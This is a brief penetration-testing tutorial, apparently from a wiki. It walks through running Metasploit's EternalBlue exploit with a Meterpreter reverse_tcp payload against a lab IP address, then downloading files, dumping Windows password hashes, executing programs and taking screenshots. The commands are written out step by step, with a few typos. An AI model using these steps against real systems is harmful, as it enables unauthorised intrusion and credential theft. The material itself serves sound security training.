Post exploitation with Meterpreter

Exploitation with Meterpreter

First of all, start the msf console by typing the following terminal command in the Kali terminal window

We’re using reverse_tcp as the stager and Meterpreter as the stage.

We will begin by setting up the Eternal Blue exploit. Select (ms17_010_eternalblue) then set windows/x64/meterpreter/reverse_tcp as the selected payload

Next, configure the exploit settings then run the exploit with exploit command:

$ set payload windows/x64/meterpreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploi

File transfer with Meterpreter

With Meterpreter, you can download a file using the $download- command.

$ download /windows/system32/drivers/etc/host

Similarly, you can upload information to the machine as well, using $upload- command

Extracting User Credentials:

Use code script credential_collector to extract user accounts information, or use The hash dump post module to similar effect.

We will use the hash dump post module to proceed with harvesting the credentials. Type the following msf command.

$ run post/windows/gather/hashdump

As we can see, we have obtained the Coen, guest, and admin accounts. The LM hash(admin’s) and the NTLM (guest’s) hash pertains to empty passwords, whereas the Coen hash is a password that you’ll need to crack. You can do so by using a password cracker.

Executing files

You can run any file on the system by using: execute -f. This includes both executable files and programs with multiple supporting files. For example, to run the built-in calculator app in the windows os, type

execute –f calc.exe

Taking screenshots

You can also capture screenshots from the point of view of the user. Just type screenshot in the Meterpreter’s command shell, and you’ll get a screenshot of the display on the system.

$ execute -f calc.exe $ screenshoT

PreviousWindows Post Gather Modules NextTransferring Files

Last updated 3 years ago

Was this helpful?